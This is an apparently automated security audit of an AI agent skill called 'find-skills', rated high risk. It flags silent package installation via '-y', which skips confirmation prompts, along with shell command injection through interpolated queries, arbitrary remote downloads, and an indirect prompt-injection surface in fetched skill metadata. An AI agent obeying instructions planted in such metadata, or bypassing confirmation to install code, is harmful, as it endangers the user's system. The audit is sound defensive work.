find-skills
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADSPROMPT_INJECTION
Full Analysis
- [REMOTE_CODE_EXECUTION] (HIGH): The skill provides instructions to install third-party packages using 'npx skills add -g -y'. The use of the '-y' flag is a high-risk pattern as it bypasses user confirmation prompts, allowing for the silent installation and execution of arbitrary code from remote sources like GitHub.
- [COMMAND_EXECUTION] (HIGH): The skill relies on shell command execution via 'npx' for searching and managing packages. User-provided queries are interpolated directly into shell commands ('npx skills find [query]'), which presents a risk for command injection if the agent does not strictly sanitize the input.
- [EXTERNAL_DOWNLOADS] (MEDIUM): The primary purpose of the skill is to fetch and install external code. While it references trusted repositories such as 'vercel-labs/agent-skills', the underlying mechanism allows for downloading content from any arbitrary repository, which could lead to the installation of malicious software.
- [PROMPT_INJECTION] (LOW): The skill exhibits a surface for Indirect Prompt Injection (Category 8). * Ingestion points: User-supplied search queries and the textual output of the 'npx skills find' command are processed by the agent. * Boundary markers: There are no explicit delimiters or safety instructions to prevent the agent from being influenced by malicious instructions embedded in the metadata or descriptions of external skills found during a search. * Capability inventory: The agent possesses the capability to execute shell commands and perform software installations based on the results of these searches. * Sanitization: The skill lacks defined validation or sanitization logic for the data ingested from the external 'skills' ecosystem.
Recommendations
- AI detected serious security threats
Audit Metadata